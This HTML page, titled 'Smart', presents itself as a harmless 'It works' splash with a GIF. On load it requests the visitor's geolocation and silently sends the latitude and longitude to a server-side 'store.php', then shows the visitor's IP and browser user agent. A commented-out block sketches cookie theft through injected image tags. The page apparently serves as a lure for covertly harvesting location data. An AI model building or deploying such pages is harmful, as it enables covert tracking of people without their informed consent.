<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Smart</title>
    <style>
        body{
            min-height: 95vh;
            display: flex;
            align-items: center;
            text-align: center;
            justify-content: center;
        }
        .countener{
          display: flex;
          flex-direction: column;
          align-items: center;
          justify-content: center;
          width: 100%;
          min-height: 90vh;
          flex-direction: column;
        }
        img{
            box-shadow:  0px 0px 5px wheat;
            border-radius: 5px;
            width: 50%;
        }
        a{
          text-decoration: none;
          color: white;
          font-size: 18px;
        }
        p{
          color: #eee;
        }
    </style>
</head>
<body style="background-color: #111;" onload="getLocation()" id="body">
  <div class="countener">
    <img src="./giphy.gif">
      <h1 id="h1" style="color: #aaa;text-shadow: 0 0 5px wheat;">
          It works
      </h1>
      <p></p>
  </div>  
    <a href="www.google.com" style="display: none;" id="clicker">google</a>
    <!-- <script>
        // var i = document.cookie;
        
        // document.getElementById('body').innerHTML += `<img src='cookie = "${i}"' onerror=''>`;
        // document.getElementById('body').innerHTML += `<img src='ip = "${data.ip}"' onerror=''>`;
    </script> -->
    <script>
        var x = document.getElementById("h1");
        
        function getLocation() {
          if (navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(showPosition);
          } else { 
            x.innerHTML = "Geolocation is not supported by this browser.";
          }
        }
        function showPosition(position) {
          const xhttp = new XMLHttpRequest();
          xhttp.open("GET","store.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude);
          xhttp.send();
          console.log(xhttp.readyState);
          fetch('https://api.ipify.org?format=json')
          .then(response => response.json())
          .then(data => document.getElementById("h1").innerHTML += "<br>IP : " + data.ip);
          x.innerHTML = "Latitude: " + position.coords.latitude + 
          "<br>Longitude: " + position.coords.longitude;
          var link = "https://www.latlong.net/c/?lat="+ position.coords.latitude + "&long=" + position.coords.longitude;
          document.querySelector(".countener").innerHTML += `<a href="${link}" target="_blank">clickmy</a>`
          document.querySelector("p").innerHTML = navigator.userAgent;
          // if (xhttp.readyState == 4 && xhttp.status == 200){
            
          // }
        }
        </script>
</body>
</html>
